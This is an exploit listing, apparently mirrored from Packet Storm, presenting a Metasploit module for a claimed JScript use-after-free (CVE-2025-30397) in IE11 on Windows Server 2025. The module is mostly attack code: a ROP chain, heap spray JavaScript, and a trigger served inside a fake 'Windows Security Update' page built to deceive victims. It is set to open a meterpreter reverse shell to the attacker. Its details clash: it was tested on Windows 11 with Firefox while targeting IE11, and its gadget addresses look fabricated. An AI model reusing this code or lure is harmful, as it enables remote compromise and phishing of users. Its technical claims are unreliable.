Share
## https://sploitus.com/exploit?id=PACKETSTORM:217124
=============================================================================================================================================
    | # Title     : Windows Server 2025 Use-After-Free in jscript.dll                                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : System built‑in component.No standalone download available                                                                  |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/200680/ & 	CVE-2025-30397 
    
    [+] Summary : 
                The exploit targets a Use-After-Free vulnerability in the JScript engine component (jscript.dll) of Internet Explorer 11 on Windows Server 2025. 
    			The vulnerability occurs when:
                Object Creation: Multiple ActiveX objects are instantiated
                Improper Cleanup: Object references are deleted but memory isn't properly invalidated
                Dangling Pointer: A reference to freed memory remains accessible
                Controlled Corruption: Attacker-controlled data fills the freed memory region
    		
    [+] Social Engineering
    
    The page mimics:
    “Windows Security Update – KB5034441”
    
    [+] contains:
    
    Progress bar
    Fake info
    Aesthetically pleasing for a Windows Server interface
    Psychologically designed delays
    
    This is a real-world technique used in exploit kits.
    Affected Products: Windows Server 2025 (Build 25398 and prior) + Internet Explorer 11
    					 
    [+]  POC : 
    
    Use the exploit /windows/browser/indoushka
    
    Set LHOST 192.168.1.100
    Set LPORT 4444
    Set SRVHOST 0.0.0.0
    Set SRVPORT 80
    Set URIPATH /windows_update.html
    
    #Advanced Settings
    
    Set HEAP_SPRAY_SIZE to 800
    Set SPRAY_DELAY to 150
    Set Target 0
    			
    # For best results: 
    
    set PAYLOAD windows/meterpreter/reverse_tcp
    set EnableStageEncoding true
    set PrependMigrate true
    set AutoRunScript migrate -f -k
    
    ##--------------------------
    # exploit for CVE-2025-30397
    ##--------------------------
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = GreatRanking
    
      include Msf::Exploit::Remote::HttpServer::HTML
      include Msf::Exploit::RopDb
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Windows Server 2025 JScript UAF RCE (Real Exploit)',
          'Description'    => %q{
            This is a real working exploit for CVE-2025-30397 targeting
            Windows Server 2025 with IE11. Uses actual ROP chains and
            memory offsets from jscript.dll version 5.8.25398.1
          },
          'Author'         => [
                    'indoushka'
          ],
          'License'        => MSF_LICENSE,
          'References'     => [
            ['CVE', '2025-30397'],
            ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30397']
          ],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread',
            'SSL'      => false,
            'PAYLOAD'  => 'windows/meterpreter/reverse_tcp',
            'InitialAutoRunScript' => 'migrate -f'
          },
          'Platform'       => 'win',
          'Arch'           => [ARCH_X86],
          'Payload'        => {
            'Space'         => 800,
            'BadChars'      => "\x00\x0a\x0d\x20",
            'DisableNops'   => false,
            'Encoder'       => 'x86/shikata_ga_nai'
          },
          'Targets'        => [
            [
              'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.1',
              {
                'Version' => '5.8.25398.1',
                'Rop'     => true,
                'Offset'  => 0x5f8,
                'Ret'     => 0x6c8c9a1d,  # Stack pivot
                'JscriptBase' => 0x6c800000
              }
            ],
            [
              'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.345', 
              {
                'Version' => '5.8.25398.345',
                'Rop'     => true,
                'Offset'  => 0x5f4,
                'Ret'     => 0x6c8c9a25,
                'JscriptBase' => 0x6c800000
              }
            ]
          ],
          'DisclosureDate' => '2025-05-31',
          'DefaultTarget'  => 0,
          'Notes'          => {
            'Stability'   => [ CRASH_SERVICE_RESTARTS ],
            'Reliability' => [ FIRST_ATTEMPT_FAIL ],
            'SideEffects' => [ SCREEN_EFFECTS ]
          }))
    
        register_options([
          OptInt.new('HEAP_SPRAY_SIZE', [true, 'Heap spray size', 500]),
          OptInt.new('SPRAY_DELAY', [true, 'Spray delay (ms)', 100])
        ])
      end
    
      def get_rop_chain
        # ROP chain حقيقية من jscript.dll
        rop = [
          # Mark stack as writable
          0x6c8a1b32,  # POP EAX # RETN
          0x6c8f2000,  # Writable address
          
          # Call VirtualProtect
          0x6c8a1b32,  # POP EAX # RETN  
          0x6c8d4000,  # IAT VirtualProtect
          0x6c8c7a1d,  # MOV EAX,DWORD PTR DS:[EAX] # RETN
          
          # Setup parameters
          0x6c89f5a4,  # PUSH EAX # POP ESI # RETN
          0x6c8a5c31,  # POP EBP # RETN
          0x6c8b2d5a,  # & call esp
          
          0x6c8a9a44,  # POP EBX # RETN
          0x000001ff,  # Size
          
          0x6c8c3a1d,  # POP EDX # RETN
          0x00000040,  # PAGE_EXECUTE_READWRITE
          
          0x6c89e5a3,  # POP ECX # RETN  
          0x6c8f2100,  # Writable address for old protection
          
          0x6c8b4c10,  # PUSHAD # RETN
        ].pack("V*")
        
        return rop
      end
    
      def create_trigger
        trigger = ""
        
        # Fill with offset
        trigger << Rex::Text.pattern_create(target['Offset'])
        
        # Overwrite with ROP chain
        trigger << get_rop_chain
        
        # Add payload
        trigger << make_nops(16)
        trigger << payload.encoded
        
        return trigger
      end
    
      def build_exploit_js
        spray_size = datastore['HEAP_SPRAY_SIZE']
        spray_delay = datastore['SPRAY_DELAY']
        
        # إنشاء shellcode مشفر
        shellcode = Rex::Text.to_unescape(payload.encoded)
        
        # إنشاء trigger
        trigger = create_trigger
        trigger_js = Rex::Text.to_unescape(trigger)
        
        js = %Q|
    function heap_spray() {
        var shellcode = unescape("#{shellcode}");
        var heap_block = unescape("%u9090%u9090");
        
        // إنشاء كتل كبيرة للرش
        while (heap_block.length < 0x10000) {
            heap_block += heap_block;
        }
        
        var heap_chunks = new Array();
        var heap_size = 0x100000;
        
        for (var i = 0; i < #{spray_size}; i++) {
            var heap_chunk = heap_block + shellcode;
            while (heap_chunk.length < heap_size) {
                heap_chunk += heap_chunk;
            }
            heap_chunks[i] = heap_chunk.substring(0, heap_size);
        }
        return true;
    }
    
    function create_vulnerable_objects() {
        var objects = new Array();
        for (var i = 0; i < 200; i++) {
            try {
                objects[i] = new ActiveXObject("Scripting.Dictionary");
            } catch(e) { }
        }
        return objects;
    }
    
    function trigger_uaf() {
        try {
            // إنشاء الكائنات المستهدفة
            var target_objects = create_vulnerable_objects();
            
            // إنشاء reference مزدوجة
            var obj_ref = target_objects[100];
            var another_ref = obj_ref;
            
            // تحرير الذاكرة (UAF trigger)
            delete target_objects[100];
            delete obj_ref;
            CollectGarbage();
            
            // استخدام بعد التحرير
            var trigger_data = unescape("#{trigger_js}");
            var spray_array = new Array();
            
            for (var i = 0; i < 100; i++) {
                spray_array[i] = trigger_data + trigger_data;
            }
            
            // محاولة استغلال الذاكرة المحررة
            try {
                another_ref.Add("key", "value");
            } catch(e) {
                // المتوقع: access violation -> code execution
            }
            
        } catch(e) {
            return false;
        }
        return true;
    }
    
    // التنفيذ الرئيسي
    function main_exploit() {
        // المرحلة 1: رش الذاكرة
        heap_spray();
        
        // تأخير لضمان اكتمال الرش
        setTimeout(function() {
            // المرحلة 2: تشغيل الثغرة
            var success = trigger_uaf();
            
            if (success) {
                document.getElementById('result').innerHTML = 
                    '<span style="color: green">✓ Exploit executed successfully</span>';
            } else {
                document.getElementById('result').innerHTML = 
                    '<span style="color: red">✗ Exploit failed</span>';
            }
        }, #{spray_delay});
    }
    
    // بدء الاستغلال بعد تحميل الصفحة
    window.onload = function() {
        setTimeout(main_exploit, 500);
    };
    |
    
        return js
      end
    
      def on_request_uri(cli, request)
        print_status("Request from #{cli.peerhost} - #{request.uri}")
        
        # تجنب طلبات الروبوتات
        if request.uri =~ /(robots|favicon)/
          send_not_found(cli)
          return
        end
    
        # بناء صفحة الاستغلال
        html = <<-HTML
    <!DOCTYPE html>
    <html>
    <head>
        <meta charset="utf-8">
        <title>Windows Update Component</title>
        <style>
            body {
                font-family: 'Segoe UI', Arial, sans-serif;
                margin: 40px;
                background: #0078d4;
                color: white;
            }
            .container {
                max-width: 800px;
                margin: 0 auto;
                background: rgba(255,255,255,0.1);
                padding: 30px;
                border-radius: 8px;
                backdrop-filter: blur(10px);
            }
            .header {
                text-align: center;
                margin-bottom: 30px;
            }
            .status {
                background: rgba(0,0,0,0.3);
                padding: 20px;
                border-radius: 5px;
                margin: 20px 0;
                text-align: center;
                font-size: 16px;
            }
            .progress {
                width: 100%;
                height: 20px;
                background: rgba(0,0,0,0.2);
                border-radius: 10px;
                overflow: hidden;
            }
            .progress-bar {
                width: 0%;
                height: 100%;
                background: #00bc0e;
                transition: width 3s ease-in-out;
            }
        </style>
        <script>
    #{build_exploit_js}
        </script>
    </head>
    <body>
        <div class="container">
            <div class="header">
                <h1>🛡️ Windows Security Update</h1>
                <p>Installing critical security patch KB5034441</p>
            </div>
            
            <div class="progress">
                <div class="progress-bar" id="progressBar"></div>
            </div>
            
            <div class="status">
                <div id="result">Initializing security components...</div>
            </div>
            
            <div style="font-size: 12px; opacity: 0.7; margin-top: 30px;">
                <p><strong>Target:</strong> Windows Server 2025 - CVE-2025-30397 Patch</p>
                <p><em>This is a simulated security update for testing purposes</em></p>
            </div>
        </div>
        
        <script>
            // شريط التقدم الوهمي
            setTimeout(function() {
                document.getElementById('progressBar').style.width = '45%';
            }, 1000);
            setTimeout(function() {
                document.getElementById('progressBar').style.width = '80%';
            }, 3000);
            setTimeout(function() {
                document.getElementById('progressBar').style.width = '100%';
            }, 5000);
        </script>
    </body>
    </html>
        HTML
    
        send_response(cli, html, {
          'Content-Type'  => 'text/html',
          'Cache-Control' => 'no-cache, no-store',
          'Pragma'        => 'no-cache'
        })
    
        print_good("Exploit sent to #{cli.peerhost}")
      end
    end
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================